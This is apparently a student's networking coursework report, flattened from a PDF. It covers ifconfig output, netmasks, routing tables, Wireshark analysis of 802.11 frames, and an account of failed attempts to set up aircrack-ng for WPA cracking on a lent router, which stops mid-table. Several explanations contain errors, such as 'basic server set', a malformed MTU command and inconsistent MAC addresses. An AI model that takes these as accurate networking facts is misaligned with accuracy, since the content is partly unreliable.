Data Communication | My Assignment Tutor

Data CommunicationLecturer Liang ChenStudent Borys KubistyDue 12/05/2019Submitted 11/05/2019Data Communications21383564 2IntroductionI hope you enjoy reading through all elements as much as I enjoyed learning and exploring differentarea of this module.Table of ContentsIntroduction…………………………………………………………………………………………………………………………. 2Table of Contents …………………………………………………………………………………………………………………. 2Element 1…………………………………………………………………………………………………………………………….. 4A1: Find out the MAC address and the allocated IP address for the active network interfaces ……. 4A2: Do you have a loopback interface being showed? If it is, explain what are loopback interfacesand how they are used. ……………………………………………………………………………………………………… 6A3: Explain the semantics of the output fields of the ifconfig command, the following fields inparticular: UP, BROADCAST, MULTICAST, MTU……………………………………………………………………… 7A4: Explain what a netmask and how it is used only if you did not do so as part of A2……………… 11A5: Describe a means to prevent the MAC address spoofing attack……………………………………….. 12A6: Explain how the route table works by going through the meaning of each column of this tablesuch as Destination, Gateway, Flags, Refs, Use, Netif, Expire. ……………………………………………….. 13A7: What is the default gateway IP address? ………………………………………………………………………. 15A8: Examine the active routing table and verify that if the default gateway route has beenremoved? Can other computers on LAN be reached? ………………………………………………………….. 16A9: Examine the active routing table and verify that if the default gateway route has beenrestored. ………………………………………………………………………………………………………………………… 17Element 2…………………………………………………………………………………………………………………………… 18A1: What are the SSIDs of the two access points that are issuing most of the beacon frames in thistrace?…………………………………………………………………………………………………………………………….. 18A2: What are the intervals of time between the transmissions of the beacon frames thelinksys_ses_24086 access point? From the 30 Munroe St. access point?………………………………… 19A3: What (in hexadecimal notation) is the source MAC address on the beacon frame from 30Munroe St? …………………………………………………………………………………………………………………….. 20A4: What (in hexadecimal notation) is the destination MAC address on the beacon frame from 30Munroe St? …………………………………………………………………………………………………………………….. 20A5: What (in hexadecimal notation) is the MAC BSS id on the beacon frame from 30 Munroe St?21A6: The beacon frames from the 30 Munroe St access point advertise that the access point cansupport four data rates and eight additional “extended supported rates.” What are these rates?21A7: Find the 802.11 frame containing the SYN TCP segment for this first TCP session (thatdownloads alice.txt). ……………………………………………………………………………………………………….. 22A8: Find the 802.11 frame containing the SYN, ACK segment for this TCP session……………………. 24Data Communications21383564 3A9: What two actions are taken (i.e., frames are sent) by the host in the trace just after t = 49, toend the association with the 30 Munroe St AP that was initially in place when trace collectionbegan? Looking at the 802.11 specification, is there another frame that you might have expectedto see, but don’t see here?……………………………………………………………………………………………….. 26A10: Examine the trace file and look for AUTHENICATION frames sent from the host to an AP andvice versa. How many AUTHENTICATION messages are sent from the wireless host to thelinksys_ses_24086 AP (which has a MAC address of Cisco_Li_f5:ba:bb) starting at around t = 49?26A11: Does the host want the authentication to require a key or be open? ……………………………… 27A12: Do you see a reply AUTHENTICATION from the linksys_ses_24086 AP in the trace? …………. 27A13: At what times are there an AUTHENTICATION frame from the host to the 30 Munroe St. AP,and when is there a reply AUTHENTICATION sent from that AP to the host in reply?……………….. 28A14: At what time is there an ASSOCIATE REQUEST from host to the 30 Munroe St AP? When isthe corresponding ASSOCIATE REPLY sent? ………………………………………………………………………… 28A15: What transmission rates is the host willing to use? The AP?………………………………………….. 29A16: What are the sender, receiver and BSS ID MAC addresses in these frames? What is thepurpose of these two types of frames?………………………………………………………………………………. 29Element 3…………………………………………………………………………………………………………………………… 31Initial attempt and router issues ……………………………………………………………………………………….. 31Further look into variables out of my control………………………………………………………………………. 31Attempting with VM ………………………………………………………………………………………………………… 31Further look into driver issues when attempting with VM…………………………………………………….. 32Trial and error until working method found………………………………………………………………………… 32Selected Method …………………………………………………………………………………………………………….. 34Conclusion ……………………………………………………………………………………………………………………… 52Evidence A …………………………………………………………………………………………………………………………. 53References…………………………………………………………………………………………………………………………. 54Data Communications21383564 4Element 1A1: Find out the MAC address and the allocated IP address for the active networkinterfacesIntroductionTo begin answering this question, I will explain what a MAC and IP addresses are and their purposein computer connected network.The main difference can be explained when taking into account the OSI, TCP/IP models. In the linklayer, MAC addresses are used in frame headers to identify course and destination. Similarly to theIP, it is used for the identification.IP is used more for the recognition in networks, therefore changing when connected to differentmachines. To conclude, MAC address is used to transfer data between physical node, IP is more forrecognition between networks, both can be configured and changed / spoofed.Going FurtherNetwork connected devices have a MAC (Media Access Control) address. This type of address isallocated to devices and doesn’t normally change. Devices can have many MAC addresses as a singledevice may have multiple interfaces to connect to a network, e.g. Wi-Fi, Bluetooth, Ethernet. Allthose interfaces will have different MAC addresses. A MAC address consists of 48-bit hexadecimal(base 16, i.e. 0 to 9 and A to F), containing of 12 characters [1]. The format below illustrates what aMAC address usually looks like:> 0c:63:3a:e6:45:b9MAC address is that they sometimes are spoofed, or even manually changed by users depending onhardware. Spoofing your MAC address can also be done manually and is gaining different use cases,such as in the new Android version, Android Q. Here is a statement about the upcoming update [2]:“Android Q devices will now transmit a randomized MAC address by default, at all times, and forall communications”.IP (Internet Protocol) address differs to MAC addresses in many ways. An IP address usually changeson a computer [3], and over time, it will have lots. Nevertheless, there is the ability to reserve astatic IP address. Usually it is businesses who are hosting domains and need it to refer to a specific IPaddress [4]. There are currently two major versions of the Internet Protocol: IPv4, and IPv6. IPv4 iscurrently the more familiar version having larger support than IPv6 due to existing longer. Theformat of an IPv4 address is four values from 0 to 255 separated by dots, format illustrates below.> 192.168.0.1However, there is one major and unavoidable problem of IPv4 compared to IPv6: availablecombinations. For IPv4, there are 4,294,967,296 (32-bit, hence 2″#), compared to the massive340,282,366,920,938,463,463,374,607,431,768,211,456 that IPv6 supports [3].Data Communications21383564 5To begin the question and find the MAC and IP address, I will be using the available terminal on mymachine. In the terminal, to find the MAC address and other network interface specific informationyou can use the following command:> ifconfigThis command is a system administration utility in UNIX and UNIX-like operation systems [5],working on operating systems like macOS and distros of Linux. By running this command on mymachine, I am able to get my active network interfaces. Evidenced in a screenshot below.I have two active network interfaces, I have documented the MAC and IP address for both of them inthe table below. MACIPenp0308:00:27:56:8e:e710.0.2.15lo::1127.0.0.1 I will be mentioning why thelo network interface differsfrom the regular MAC addressformat in the next section. Ifyou add the option -a to theifconfig command, youwill get a list of all interfaces,active or inactive. Evidenced ina screenshot on the right.From this, we can deduct thatall my network interfaces are in the active state.In addition, with this command, you can look up a single network interface by entering the name ofthe network interface after the ifconfig command, e.g. (evidenced in a screenshot below)> ifconfig enp0s3Data Communications21383564 6A2: Do you have a loopback interface being showed? If it is, explain what are loopbackinterfaces and how they are used.On my machine, the second item in the list of network interfaces is an interface with the name oflo. This is normally a name for a loopback network interface.The reason why the MACaddress differed from the usualformat, is because a loopbackinterface is a virtual interface[6], unlike a physical networkinterface like a NIC, networkinterface card / controller, itactually doesn’t exist in themachine. There is a chance thatthe IP of the loopback interfaceis localhost [8]. You can alsouse this when you are targeting your PC for networking matters, e.g. ping, or if you have a localweb server running on your machine (localhost:6789/welcome.html).Inner communication is asignificant use case of aloopback network interface [14].Programs (/ servers, etc.) whichneed to connect to the devicethey are on, can connectthrough the loopback networkinterface to a server that isrunning on the machine.There are three other use casesfor the loopback interfaces [7].1. Identification2. Routing3. FilteringData Communications21383564 7IdentificationDevices supporting the TCP, Transmission Control Protocol, and IP, used the virtual interface to“validate the functional state” of the particular device [6], essentially its usage is for theidentification of the device as other network interfaces may be disconnected from the device for anumber of reasons, e.g. change in network topology [7] (change in the network and/or networkconfiguration). An important note is that using the loopback interface as a way to identify the devicefrom the IP is a mistake as there can be mismatches [7]. By pinging the loopback interface, you maybe prompted with misleading results.RoutingThe loopback interface is used for information about the route in a network [7], more accurately,device or network specific properties which the device and / or network has been configured toissue to any interaction with a device, e.g. requesting information for a routing algorithm (i.e. OSPF,Open Shortest Path First).FilteringIt is also used in the packet filtration in the firewall [7]. The routing engine is able to distinguishwhere packets are from, and if they are for the machine.These are not the only uses however, they are notable.A3: Explain the semantics of the output fields of the ifconfig command, the followingfields in particular: UP, BROADCAST, MULTICAST, MTU.I’d like to mention that it was necessary for me to have ‘admin’ privileges to perform somecommands. In Ubuntu, the Linux distribution I am using, instead of there being administratoraccounts / users, you can give an account / user ‘root’ privilege. To perform commands that requirethis, I performed the following command:> sudo -iThis required me to input my password and then converted my terminal session to run as root. Thisis evidenced in a screenshot below.UPThe semantic UP works in conjunction with DOWN. To demonstrate the usage of the semantic UP, Iwill be also using DOWN. In order to understand the purpose, we need to note that an interface canhave an on and off state. The semantics UP and DOWN essentially allow for the state to be on or off,or more accurately described as its state being available / active or not available / not activerespectively. When we use the semantic DOWN, it will make the interface not available, having astate of being down, and when we use the semantic UP, it will make the interface available, havingthe state of being up [9].When running as root, I first used DOWN to make a network interface being not available. Evidencedin a screenshot below.Data Communications21383564 8Now it is expected that the network interface that I have made not available shouldn’t come up inthe list of network interfaces when performing the ifconfig command (as this only showsavailable network interfaces). Evidenced in a screenshot below.As we can see, there is only one network interface present, and the one we made not available, ismissing from the available list. In order to check that the network interface is marked as down andwasn’t unplugged, etc., I ran the ifconfig command with the -a option selected. Evidenced in ascreenshot below.Finally, we can restore functionality to our network interface by typing the following command.> ifconfig enp0s3 upNow if we list all of the available network interfaces, we can see that our network interface be backin the available list. Evidenced in the screenshot below (boxes have been displayed on thescreenshot to highlighted the relevant network interface).Data Communications21383564 9BROADCASTBroadcast address has the same format as IPv4, usually with the last digits being different fordevices in the same network. We can see this with the image below.The address which is specified is normally used with certain protocols which will broadcast todevices on the connected network [11]. This will be the address that will be used. Below is anexample of setting a broadcast to a network interface> ifconfig enp0s3 broadcast 10.0.2.213If there is no argument specified when running the BROADCAST semantic, then the attribute will beset to IFF_BROADCAST [9]. The address above isn’t properly configured because it has no 255.When further looking at network devices section of the Linux Programmer’s Manual, we are able tofind the following [10]:“IFF_BROADCAST Valid broadcast address set.”MULTICASTMulticast and broadcast are similar, they both output data toother devices. However, the key difference being that data aren’tgoing to all devices, but only the interested ones. With amulticast router, ‘members’ (devices) that can be listed as a partof a group which is then used to send packets [12].With a network interface, you are able to enable and disablemulticast by writing multicast to enable and -multicastto disable [12]. Below is an example of how we would disable multicast for a network interface.> ifconfig enp0s3 -multicastTo enable it again, we perform the following.Data Communications21383564 10> ifconfig enp0s3 multicastMTUThe Maximum Transmission Unit (MTU), is in maximum block of data that can be transmitted in asingular unit (in bytes) [15]. In the terminal, we are able to set that value for specific networkinterfaces with the MTU ifconfig command.To explain how the MTU is relevant in network communication,let’s say we need to transfer 4000 bytes of data when our MTU is1500 bytes seen in an example on the right.For instance, for the data to betransmitted through a networkinterface, we will need to divideit into chunks that have amaximum of 1500 bytes each.These packages are then sent inthe chunks shown above ratherthan in a whole 4000 byte unit.In addition, if we had an MTU of1000 bytes, the chunks would differ in size and quantity, this can be seen on the right.If we type ifconfig, we are able to pick up on the default (already defined value) maximumtransmission unit for each interface.However, we can go a step beyond and set it by using the following:> ifconfig enp0s3 1000After we execute the command, we are able to check MTU with ifconfig. The following wasshown proving that we changed the value.The major factor to consider when setting the MTU, is how significantly there is packet loss inconnections. For 4000-byte, if a packet is failed to be received and therefore needs to be sent again,an MTU of 1500 will be sending a bigger package, than an MTU of 1000. It is more stress on thenetwork, however, in this case, it is not significant.Data Communications21383564 11We need to also consider that there is additional data sent for every packet. So, for more packets,more information being sent, information that isn’t in the requested data but data necessary to getthe data to where it needs to be.There isn’t a definitive or best MTU to have, it depends on circumstance, and even then, it doesn’taffect the network considerably.A4: Explain what a netmask and how it is used only if you did not do so as part of A2Netmasks are used for network interfaces, used to define the class and range of IP addresses [17].Netmasks work as templates for which IPs can be classed. There are two “states” for a netmask tobe in per section of bits. First is 255, marking this section of the IP as a network bit, and the other,0, marking the section of the IP as a host bit [18].With this information, and a relevant network configuration (and other machines using theconnections), we can define a subnet for the network using the netmask method. The netmasklengths are segmented in 8 bits. Each section of the netmask would be 8 bits [16]. Segments arecreated which give the netmask the definition / classification, i.e.ReferenceNetmask 255 : 255 : 255 : 25511111111 11111111 11111111 111111118 16 24 32 Binary Length With one of the network interfaces on my computer, I was able to gather the following informationabout my netmask, etc. from the screenshot below.IP 10 . 0 . 2 . 15255 : 255 : 255 : 0 Netmask I have highlighted some values to explain the correlation between network and host bits toemphasize how the 255 is the network identifiers, and 0 is the host identifiers. Therefore, we candeduct the following.• The network address (without hosts)o 10:0:2:• The host address (for identification of the host only)o : : :15• And also, how many machines are supported in the networkData Communications21383564 12o 254 theoretically available machines on the network (0 & 255 are reversed [16]).The reason why all of the networks aren’t with a netmask of 255:0:0:0, is because there are onlyfinite number of address, and it would be wasteful if you were to have more slots than the devicesyou are using on a network.All classifications are displayed below with the appropriate length.Class ANetmask 255 : 0 : 0 : 011111111 00000000 00000000 000000008 – – – Binary Length Class BNetmask 255 : 255 : 0 : 011111111 11111111 00000000 000000008 16 – – Binary Length Class CNetmask 255 : 255 : 255 : 011111111 11111111 11111111 000000008 16 24 – Binary Length A5: Describe a means to prevent the MAC address spoofing attackMAC address attacks are usually when a user is masking to be another to bypass authentication [19].In order to prevent the masking of an individual, we need a way to confirm whether the userrequesting some type of data is the user they say they are. This could be done by using ausername/email and password. Now, the requesting data can only be accessed by a designated user,and it adds the additional functionality of the data being available from multiple locations.An extra step for someone to confirm their identify is a viable solution (two factor authentication).There are many ways in which this kind of system can be implemented. To additionally checkwhether the person is who they are claiming, biometric authentication can be considered. You canalso get another device (which can previously be logged into, e.g. mobile phone) to grant you access.There is also another type of MAC address attack: when there is a denial of service (DoS) ordistributed denial of service (DDoS) to interfere the connection with a normal user [19]. This kind ofData Communications21383564 13attack would normally be done with de-authentication frames send to a party to disconnect a user.This can also apply with the broadcast command which is more disruptive [19]. This is more difficultto prevent, and the solution would depend on the type of application of the MAC address, e.g.whether it is to verify a serial key, or a user trying to log in, etc.A6: Explain how the route table works by going through the meaning of each columnof this table such as Destination, Gateway, Flags, Refs, Use, Netif, Expire.IntroductionA routing table contains data about where to route a packet to the next destination / “hop” in thesurrounding network. Each record in a routing table has different attributes in order to guide themachine, i.e. destination, gateway, flags, expire, etc. Routing tables are required for machines thatuse TCP/IP [20]. The following command will list all of the incoming and outgoing TCP and UDPnetwork connections, host computer routing table information and interface statistics. We can viewrouting table of the machine, we can perform the net(work) stat(istics) command. To find theroute table, I will be using the following command, the output of which is found below.> netstat -rThis will list us the followinginformation about each route:• Destination• Gateway• Flags• Refs• Use• Netif• ExpireWithout this option (just performing netstat), we would be listing the connections that themachine has. From this machine, the IPv6 table is also available, screenshotted below.Data Communications21383564 14Explaining TableInformation for the different type of data available for each route record [20]. ColumnExplanationExampleDestinationThe destination host / network.127GatewayThis address is the pointer to where the networkcan be reached [24].127.0.0.1FlagsThe flags allow to describe the state of the route.By looking at the manual for the command netstat,we can see what do the flags mean. To look at themanual, you need to perform the followingcommand:> man netstatSee below table for the result, image [a].UCSExplanation of instance:“U”, Route usage / ‘UP’“C”, Generate new route on use“S”, Manually added> Information gathered frommanual.RefsGives the current number of active uses for theroute [23].89NetifThe network interface this route is related to [21].en0ExpireExpire is in seconds remaining until the entryexpires and is no longer used in the routing table[22].1195 [a]:Data Communications21383564 15A7: What is the default gateway IP address?The default gateway IP address is theaddress of a device, e.g. router, that iscontacted whenever there is a device onits network that needs to send or receivedata from another network (device) [25].To explain further, the default gateway isa router, it is like an access point (but notnecessarily wireless) for devices on itsnetwork to communicate. So, a defaultgateway to a node on a network is therouter to communicate by default.In addition, a default gateway can be acomputer, so in that sitation a defaultgateway IP address might be of acomputer which has other internet capable nodes connected. This would then require the computerto have two types of connections.1. Connection to theinternet2. Other devices thatare connected tothe internet but donot have aninternet connectionthere they need totransfer datathrough anothernode.An example of this is shownon the right (coloured linessignify the default gatewayIP and the red signifies theconnection to outernetworks / internet).Data Communications21383564 16A8: Examine the active routing table and verify that if the default gateway route hasbeen removed? Can other computers on LAN be reached?Before executing the relevant command, this is what our routing table looks like:To answer this question, I will begin by performing the delete command:> route delete _I will be replacing the _ (place holder) with the name of the default gateway, i.e. default.If we then list the routing table, we see that it has been deleted as the default is no longer present.To prove this, I will be trying to access a site:However, this doesn’t stop me having access to computers on the same network, I will still be ableto access a website or network-attracted storage device. Because I do not have anything hosting onanother device, I am not able to demonstrate this.Data Communications21383564 17A9: Examine the active routing table and verify that if the default gateway route hasbeen restored.Before executing the relevant command, this is what our routing table looks like:To answer this question, I will begin by performing the add command:> route add _ –I will be replacing the _ (place holder) with destination, and the – (place holder) with thegateway, 10.24.28.1, which is the address of my access point. To conclude, we will be adding thegateway of 10.24.28.1 with the destination of default (name).If we then list the routing table, we see that it has been added.To prove this, I will be trying to access a site:Data Communications21383564 18Element 2A1: What are the SSIDs of the two access points that are issuing most of the beaconframes in this trace?To search exactly how many packets are related to an SSID, I will be using the following command:> wlan.ssid = “”I have discovered that there were two main SSIDs which were sent to and from the access point /router, and they were the following:• 30 Munroe St• linksys12The 30 Munroe device was responsible for 851 packets of 2364 (36.0%), Evidenced in the screenshotbelow.However, not all were beacon frames.The linksys12 device was responsible for 24 packets of 2364 (1.0%), as evidenced in the screenshotbelow. Even though only 1.0% of the packets are relevant, this SSID is still the largest contributor tothe packets which is identifiable.Data Communications21383564 19A2: What are the intervals of time between the transmissions of the beacon framesthe linksys_ses_24086 access point? From the 30 Munroe St. access point?We can first gather the relevant data from the Wireshark capture by filtering out the SSID andlooking for beacon frames.– Comparing packet 9 and 110.393174 – 0.290284 = 0.10289– Comparing packet 11 and 130.495032 – 0.393174 = 0.101858– Finding the average(0.10289 + 0.101858) / 2 = 0.102374 seconds = ~ 0.1 secondsNow let’s check frame information in the frame:• 30 Munroe St.• linksys_ses_24086Both of the access points have the same beacon interval of 0.102400 seconds.Data Communications21383564 20A3: What (in hexadecimal notation) is the source MAC address on the beacon framefrom 30 Munroe St?To find the source MAC address, we can simply look at a beacon frame’s data.In this instance, it is 00:16:b6:f7:1d:51. We know it is the source address because the BSS(basic server set) ID is the same. Access points normally have the same BSS and source address if thedata is sent from the access point. This is a broadcast message because the MAC address destinationand receiver is only the hexadecimal value ff. All devices in range (network) will see this.A4: What (in hexadecimal notation) is the destination MAC address on the beaconframe from 30 Munroe St?Like in the previous question, this information is in the beacon frame’s data.In this instance, it is ff:ff:ff:ff:ff:ff. In this situation, the beacon frame is for everyonewho is able to receive the frame. This is normally on the network. This is called the broadcastaddress.Data Communications21383564 21A5: What (in hexadecimal notation) is the MAC BSS id on the beacon frame from 30Munroe St?The BSS ID (basic service set ID) is the MAC address of the AP, similar to the source MAC address asit is derived from it. Again, we look at the beacon frame data to find the BSS ID.In this instance, it is the same as the source address of the device sending the beacon frame,00:16:b6:f7:1d:51.A6: The beacon frames from the 30 Munroe St access point advertise that the accesspoint can support four data rates and eight additional “extended supported rates.”What are these rates?We need to look at the tagged parameters section of the IEEE 802.11 beacon frame.I have extracted the information into a comprehensive manner in the following table.Data Communications21383564 22 Supported RatesExtended Supported Rates1 Mbps2 Mbps5.5 Mbps11 Mbps6 Mbps9 Mbps12 Mbps18 Mbps24 Mbps36 Mbps48 Mbps54 Mbps A7: Find the 802.11 frame containing the SYN TCP segment for this first TCP session(that downloads alice.txt).The SYN TCP segment found, it is frame 474 at 24.811093. It is shown below.I will be splitting this question into different parts.A7.1: What are three MAC address fields in the 802.11 frame? Which MAC address in this framecorresponds to the wireless host (give the hexadecimal representation of the MAC address for thehost)? To the access point? To the first-hop router?To view all the MAC address that were sent with the frame, we can inspect the frame.Below is a breakdown of all of the MAC address. Some of the MAC addresses appear multiple times.Given what we know about all the MAC addresses from the table below, and due to the hexadecimal(/ base 16), only features the following: 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, A, B, C, D, E, F.Data Communications21383564 23A 802.11 frame will have three addresses,– Address 1 which will be the accesspoint– Address 2 which will be the host– Address 3 which will be the router(first hop).In this case,– The access point (address 1), will bethe receiver address– The host (address 2), will be thesource address– The router (address 3), will be thedestination address AddressDevice00:16:b6:f7:1d:51– Receiver address– BSS IDMAC address of the BSS (basic server set) and receiver of theframe. This is the MAC address of the access point.00:16:b6:f4:eb:a8– Destination addressMAC address of the router to which the host wants tocommunicate with / send the frame to. This is the MAC addressof the router (first hop router).00:13:02:d1:b6:4f– Source address– Transmitter address– STA (station / client) addressMAC address of the host sending the frame, and in this case, it isa wireless host. A7.2: What is the IP address of the wireless host sending this TCP segment? What is the destination IPaddress?We can see from the general frame view, that the IP source and destination can be found. I havehighlighted the source address (wireless host sending the TCP segment), and also the destination IPaddress.Data Communications21383564 24A7.3: Does this destination IP address correspond to the host, access point, first-hop router, or someother network-attached device?We know that the destination IP address of the SYN frame will be the source IP address of the ACK,SYN frame.In order to understand this, currently we know three possible addresses:– 00:16:b6:f7:1d:51, receiver / BSS– 00:16:b6:f4:eb:a8, destination– 00:13:02:d1:b6:4f, source / transmitterIf we look at the ACK, SYN frame, we need to look at the MAC addresses and which of the addressabove is in the source address (as that is the destination of the of the initial frame). Below is what isin the source field of the ACK, SYN frame.The address highlighted above is the MAC address of the destination of the SYN frame. Therefore,we know that the destination address corresponds to the router (first-hop), of which we know thatthe IP would be 128.119.245.12.A8: Find the 802.11 frame containing the SYN, ACK segment for this TCP session.The SYN TCP segment found, it is frame 476 at 24.827751. It is shown below, responding to initialrequest.I will be splitting this question into different parts.A8.1: What are three MAC address fields in the 802.11 frame? Which MAC address in this framecorresponds to the host? To the access point? To the first-hop router?To view all the MAC address that were sent with the frame, we can inspect the frame.Data Communications21383564 25This will follow a similar format to the previous question. In this case,– The access point (address 1), will be the destination address– The host (address 2), will be the BSS ID address– The router (address 3), will be the source addressBelow is a breakdown of all of the MAC address. Some of the MAC addresses appear multiple times.Given what we know about all the MAC addresses from the table below, and due to the hexadecimal(/ base 16), only features the following: 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, A, B, C, D, E, F. AddressDevice00:16:b6:f7:1d:51– BSS ID– Transmitter addressMAC address of the access point that will be sending the data tothe wireless host from the source address device.00:16:b6:f4:eb:a8– Source addressMAC address of the router of the network which will want tosend to the wireless host which first send the SYN (for thewireless host, this would be the first-hop router).91:2a:b0:49:b6:4f– Receiver address– Destination address– STA (station / client) addressMAC address of the host, and in this case, it is a wireless host. A8.2: Does the sender MAC address in the frame correspond to the IP address of the device that sentthe TCP segment encapsulated within this datagram?Due to the format of MAC and IP addresses being different, the sender MAC address in the framecannot correspond to the IP address of the device that sent the TCP segment.It is not possible for the MAC address in the sender frame correspond to the IP address of the TCPsegment.However, when considering IP addresses only, the SYN source IP is: 192.168.1.109 to the destinationIP of: 128.119.245.12. After, the ACK, SYN frame includes the source IP of: 128.119.245.12 and thedestination IP of: 192.168.1.109.Data Communications21383564 26A9: What two actions are taken (i.e., frames are sent) by the host in the trace justafter t = 49, to end the association with the 30 Munroe St AP that was initially in placewhen trace collection began? Looking at the 802.11 specification, is there anotherframe that you might have expected to see, but don’t see here?Frame 1733 is an IP layer action, described with the protocol “DHCP”. The other is frame 1735 whichis an 802.11 layer action, described with the protocol “802.11”. This is documented and evidencedbelow in the image.When successfully sent a dissociation frame, the connection can still be “authenticated”. However,due to sending a de-authentication frame, disassociation is assumed, therefore it was not sent.Some network configurations allow for both dissociation and de-authentication frames to be sent, inthe respective order.A10: Examine the trace file and look for AUTHENICATION frames sent from the host toan AP and vice versa. How many AUTHENTICATION messages are sent from thewireless host to the linksys_ses_24086 AP (which has a MAC address ofCisco_Li_f5:ba:bb) starting at around t = 49?An authentication is when a device / host want to join the access point’s BSS (basic server set). Thedevices will exchange frames to understand a given password. I have screenshot some of the 15frames which are sent from a wireless host (IntelCor_d1:b6:4f) to the access point(Cisco_Li_f5:ba:bb).Data Communications21383564 27All the previous authentication frames are sent at t = 49. However, there are more authenticationframes beyond that time. We find some at t = 53, evidenced below.We find even more after, around t = 57 and beyond, i.e. frame 1921 to 2924 and 2122 to 2124.A11: Does the host want the authentication to require a key or be open?When looking at the contents of the frame packet, we can view the data in the 802.11 sector. For allof the authentication frames (at least for frames at t = 49), the authentication algorithm is the opensystem.If we view what the authentication system consists of, we see that it consists of twocommunications [27]:“First, an authentication request is sent from the mobile device that contains the station ID (typicallythe MAC address).”“Next, an authentication response from the AP/router with a success or failure message.”A12: Do you see a reply AUTHENTICATION from the linksys_ses_24086 AP in thetrace?There doesn’t seem to be a reply to the authentication request. No where we can see a frame that isreplying to the authentication.Data Communications21383564 28A13: At what times are there an AUTHENTICATION frame from the host to the 30Munroe St. AP, and when is there a reply AUTHENTICATION sent from that AP to thehost in reply?Initial authentication frame at frame 2156, t = 63.168087 from the host to AP:Reply frame at 2158, t = 63.169071 from the AP to host:A14: At what time is there an ASSOCIATE REQUEST from host to the 30 Munroe St AP?When is the corresponding ASSOCIATE REPLY sent?After the authentication process, there is then the association process. There is when the accesspoint and host exchange frames in order to understand capabilities and configuration. In thissituation, the initial associate frame at frame 2162, t = 63.169910 from the host to AP:Reply frame at 2166, t = 63.192101 from the AP to host:end of main questions,challenge questions start…Data Communications21383564 29A15: What transmission rates is the host willing to use? The AP?To answer this question, you will need to look into the parameter’s fields of the 802.11 wireless LANmanagement frame. All supportedratesSupported byhostSupported by APAll extendedsupported ratesSupported byhostSupported by AP1 MbpsYesYes6 MbpsNoYes2 MbpsYesYes9 MbpsNoYes5.5 MbpsYesYes12 MbpsNoYes6 MbpsYesNo18 MbpsNoYes9 MbpsYesNo24 MbpsYesYes11 MbpsYesYes36 MbpsYesYes12 MbpsYesNo48 MbpsYesYes18 MbpsYesNo54 MbpsYesYes Evidence: HostAP A16: What are the sender, receiver and BSS ID MAC addresses in these frames? Whatis the purpose of these two types of frames?Using Wireshark, we can filter out only probe request and response by performing the followingcommand [28]:> wlan.fc.type_subtype == 4 or wlan.fc.type_subtype == 5The following is listed when executing the filter:Data Communications21383564 30Probe request information:• Sender: IntelCor_1f:57:13 (00:12:f0:1f:57:13)• Receiver: Broadcast (ff:ff:ff:ff:ff:ff) • BSS ID: BroadcastProbe response information:(ff:ff:ff:ff:ff:ff) • Sender: Cisco-Li_f7:1d:51 (00:16:b6:f7:1d:51)• Receiver: IntelCor_1f:57:13 (00:12:f0:1f:57:13)• BSS ID: Cisco-Li_f7:1d:51 (00:16:b6:f7:1d:51)Probe request would be from a device trying to find access points in its area. The response would befrom an access point, sending information that it is an available connection point. In a real-lifesituation, if a device is in range of a lot of different access points, if it were to send out a probe, itwould get a response from all of the access points.Data Communications21383564 31Element 3My walkthrough of using air crack has been with multiple machines and operating systems. I havefinal complete evidence of it working on a dual boot of a Linux distribution Mint on my personalApple MacBook Pro Late 2013. I have documented the whole process under the selected methodheading, with the aircrack process starting at Phase 6. Before that, I will be documenting my activity.Initial attempt and router issuesAt the beginning of the assessment 2 element 3, I raise an issue with my lecturer that I was unable tocomplete the element due to my lack of access to a supporting router. This was initially solved bythe university letting me borrow a router. In order for me to have WEP connectivity, I either requireto:– Connect to an internet connection provided from my internet service provider, or– Extend the range of a previous network.Further look into variables out of my controlI was unable to complete the first option because the internet connection in my accommodation issecured and I wasn’t able to provide an internet connection to the router (setup always failed). Ihave also tried, multiple networks, to extend the range of an initial network. However, there are afew issues with that. Firstly, I wasn’t able to extend connection when the initial router if it has WPAsince it automatically will inherit the security protocol. Secondly, I tried to extend a connection of anetwork that didn’t exist. This way I was able to configure the network to have WEP security. Thissuccessfully enabled me to create a network. However, there was nothing I could have done due tothere being no connection to the internet, I wasn’t able to capture any meaningful data from therouter.After speaking to my lecturer, the element was changed to also include cracking the WPA and WPA2protocols.Attempting with VMOn this point, I am trying to use WPA on any router. Initially I have tried to perform the air crackcommands on my virtual machine on my personal laptop as that is where I mostly completed all myother elements. However, due to a virtualisation layer used by VirtualBox, all wireless connectivitywas seen as an Ethernet signal. This essentially made it impossible for me to continue unless I havean external Wi-Fi adapter. So, trying tominimise the amount of installations, that iswhat I decided to buy. I went for thecheapest option on amazon.co.uk for under£10. This supported only 2.4GHz frequency, not 5GHz.Data Communications21383564 32Further look into driver issues when attempting with VMI have installed the drivers on macOS andWindows flawlessly. On both is was a matter ofgoing through the process after downloading thesystem version from the website. Though theprocess on Linux is significantly different.Depending on the Linux kernel version, there is adifferent download. The beta driver covers themore recent kernel version, and the main coversolder version of the kernel. However, I havetried both and had trouble.The installation of this device requires youto configure, compile and then install thedrivers for it to work. This is evidenced onthe right from the official installation guidefor the device. I was unable to run the makecommand (even after performing aptupdate and apt upgrade while inroot). Therefore, I had try another method.Trial and error until working method foundI have decided to try and install other distributions as I need toinstall Linux on another machine. I have listed of all variables(machines and operating systems) for this assignment, and whythey haven’t worked. MachineApple MacBook ProInstallation TypeNoneOperating SystemmacOS MojaveEvaluation I wasn’t able to use any tool (like airmon-ng or airodump-ng) except aircrack. This was I wasn’table to create a capture file with a WPA handshake included.Data Communications21383564 33 MachineApple MacBook ProInstallation TypeDual BootOperating SystemWindows 10Evaluation I had trouble with the installation of aircrack-ng as even after applying the program in the PATHfile. Air monitor (airmon-ng) wasn’t properly working making Windows unusable for this part ofthe assessment. MachineLenovo YOGA 530Installation TypeBootable USBOperating SystemMint, Xubuntu,Evaluation When trying to perform this assignment on the Lenovo YOGA 530, I couldn’t get the networkinterface to launch into monitor mode when in any Linux distro. I speculate this laptop doesn’thave a Wi-Fi card that supports monitor mode. MachineApple MacBook ProInstallation TypeBootable USBOperating SystemKaliEvaluation In order to get general drivers for my specific version of MacBook’s wireless network interfacecard, I required the internet, and without an Ethernet port or adapter, I wasn’t able to get them. MachineApple MacBook ProInstallation TypeBootable USBOperating SystemopenSUSEEvaluation I tried to boot into openSUSE without installing it, however, in order for me to use the desktopenvironment (and terminal), it required me to completed install on a disk. I wasn’t able to simply“try” this Linux distro unlike others. MachineAsus GL702VSInstallation TypeBootable USBOperating SystemMintEvaluation Data Communications21383564 34This was one of the methods where the network card had monitor mode available, enabling me toget some aircrack methods and screenshots proving it working. Screenshots of the whole processcan be found at the end of my document under the Evidence A subheading. However, this was ona computer not available to me later on so I needed to find a system where I can fully completethe process. MachineApple MacBook ProInstallation TypeDual 